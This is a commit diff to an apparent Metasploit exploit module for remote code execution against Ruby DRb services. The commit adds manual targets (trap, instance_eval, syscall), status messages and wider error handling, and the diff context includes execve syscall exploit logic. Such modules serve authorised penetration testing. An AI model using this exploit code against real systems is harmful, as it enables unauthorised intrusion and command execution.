allow manual targeting, handle errors better

Author: busterb

modules/exploits/linux/misc/drb_remote_codeexec.rb

@@ -33,7 +33,10 @@ def initialize(info = {})
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Targets'        => [
-        ['Automatic', {}],
+        ['Automatic', { method: 'auto'}],
+        ['Trap',      { method: 'trap'}],
+        ['Eval',      { method: 'instance_eval'}],
+        ['Syscall',   { method: 'syscall'}],
       ],
       'DisclosureDate' => 'Mar 23 2011',
       'DefaultTarget' => 0))
@@ -76,6 +79,7 @@ def method_syscall(p)
       p.send(:syscall, 2)
       # syscall execve
       p.send(:syscall, 11, filename, 0, 0)
+      print_status("attempting x86 execve of #{filename}")
 
     # likely x64
     rescue Errno::EBADF
@@ -89,6 +93,7 @@ def method_syscall(p)
       p.send(:syscall, 57)
       # syscall execve
       p.send(:syscall, 59, filename, 0, 0)
+      print_status("attempting x64 execve of #{filename}")
     end
 
     register_file_for_cleanup(filename) if filename
@@ -109,14 +114,19 @@ class << p
       undef :send
     end
 
-    methods = ["instance_eval", "syscall", "trap"]
+    if target[:method] == 'auto'
+      methods = ["instance_eval", "syscall", "trap"]
+    else
+      methods = [target[:method]]
+    end
+
     methods.each do |method|
       begin
         print_status("trying to exploit #{method}")
         send("method_" + method, p)
         handler(nil)
         break
-      rescue SecurityError => e
+      rescue SecurityError, DRb::DRbConnError, NoMethodError
         print_warning("target is not vulnerable to #{method}")
       end
     end